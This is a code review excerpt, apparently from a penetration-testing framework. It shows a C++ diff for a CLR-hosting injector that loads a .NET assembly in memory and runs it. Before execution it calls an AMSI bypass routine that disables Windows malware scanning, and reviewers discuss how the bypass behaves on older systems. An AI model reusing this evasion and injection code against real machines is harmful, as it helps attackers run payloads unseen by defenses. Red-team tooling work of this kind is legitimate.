external/source/HostingCLR_inject/HostingCLR/HostingCLR.cpp

```diff
@@ -0,0 +1,371 @@
+	}
+
+	hr = pRuntimeHost->GetDefaultDomain(&pAppDomainThunk);
+
+	if(FAILED(hr))
+	{
+		printf("ICorRuntimeHost::GetDefaultDomain failed w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	printf("ICorRuntimeHost->GetDefaultDomain(...) succeeded\n");
+
+	hr = pAppDomainThunk->QueryInterface(__uuidof(_AppDomain), (VOID**) &pDefaultAppDomain);
+
+	if(FAILED(hr))
+	{
+		printf("Failed to get default AppDomain w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	//Amsi bypass
+	if (amsiflag[0] == '\x01')
+	{
+		BypassAmsi();
+	}
+
+	hr = pDefaultAppDomain->Load_3(pSafeArray, &pAssembly);
+
+	if(FAILED(hr))
+	{
+		printf("Failed pDefaultAppDomain->Load_3 w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	hr = pAssembly->get_EntryPoint(&pMethodInfo);
+
+	if(FAILED(hr))
+	{
+		printf("Failed pAssembly->get_EntryPoint w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	ZeroMemory(&retVal, sizeof(VARIANT));
+	ZeroMemory(&obj, sizeof(VARIANT));
+	
+	obj.vt = VT_NULL;
+	vtPsa.vt = (VT_ARRAY | VT_BSTR);
+
+	//Managing parameters
+	if(arg_s[0] != '\x00')
+	{
+		//if we have at least 1 parameter set cEleemnt to 1
+		psaStaticMethodArgs = SafeArrayCreateVector(VT_VARIANT, 0, 1);
+
+		LPWSTR *szArglist;
+		int nArgs;
+		wchar_t *wtext;
+		wtext = (wchar_t *)malloc((sizeof(wchar_t) * raw_args_length +1));
+
+		mbstowcs(wtext, (char *)arg_s, strlen((char *)arg_s) + 1);
+		szArglist = CommandLineToArgvW(wtext, &nArgs);
+
+		vtPsa.parray = SafeArrayCreateVector(VT_BSTR, 0, nArgs);
+
+		for(long i = 0;i< nArgs;i++)
+		{
+			size_t converted;
+			size_t strlength = wcslen(szArglist[i]) + 1;
+			OLECHAR *sOleText1 = new OLECHAR[strlength];
+			char * buffer = (char *)malloc(strlength * sizeof(char));
+			
+			wcstombs(buffer, szArglist[i], strlength);
+			
+			mbstowcs_s(&converted, sOleText1, strlength, buffer, strlength);
+			BSTR strParam1 = SysAllocString(sOleText1);
+
+			SafeArrayPutElement(vtPsa.parray, &i, strParam1);
+			free(buffer);
+		}
+
+		long iEventCdIdx(0);
+		hr = SafeArrayPutElement(psaStaticMethodArgs, &iEventCdIdx, &vtPsa);
+	}
+	else
+	{
+		//if no parameters set cEleemnt to 0
+		psaStaticMethodArgs = SafeArrayCreateVector(VT_VARIANT, 0, 0);
+	}
+	
+	//Assembly execution
+	hr = pMethodInfo->Invoke_3(obj, psaStaticMethodArgs, &retVal);
+
+	if(FAILED(hr))
+	{
+		printf("Failed pMethodInfo->Invoke_3  w/hr 0x%08lx\n", hr);
+		return -1;
+	}
+
+	wprintf(L"Succeeded\n");
+	
+	return 0;
+}
+
+VOID Execute(LPVOID lpPayload)
+{
+	if (!AttachConsole(-1))
+		AllocConsole();
+
+	wprintf(L"Execution started\n");
+
+	executeSharp(lpPayload);
+
+	wprintf(L"Execution end\n");
+
+}
+
+BOOL FindVersion(void * assembly, int length)
+{
+	char* assembly_c;
+	assembly_c = (char*)assembly;
+	
+	for (int i = 0; i < length; i++)
+	{
+		for (int j = 0; j < 10; j++)
+		{
+			if (sig_40[j] != assembly_c[i + j])
+			{
+				break;
+			}
+			else
+			{
+				if (j == (10 - 1))
+				{
+					return TRUE;
+				}
+			}
+		}
+	}
+
+	return FALSE;
+}
+
+BOOL BypassAmsi()
+{
+	PatchAmsi();
+	return TRUE;
+}
```

Comment:
if there is no amsi in os (like win2008),the code will throw exception. an try catch maybe better.

Reply:
Good point.  I'd also suggest a check in the module code and raise a configuration error if that option is set on an unsupported OS.

Reply:
Good suggestion. The module has an option to disable the bypass leaving the operator to select the correct configuration. Obviously, being able to correctly detect the SO, we can check the configuration

Reply:
However, I think this road is difficult. For example, it is not enough to detect Windows 7 but it must be detected even if it is SP1 or not since the .Net Framework 4.8 is available for windows 7 sp1 and carries with it amsi.
For the moment I have better managed the absence of the dll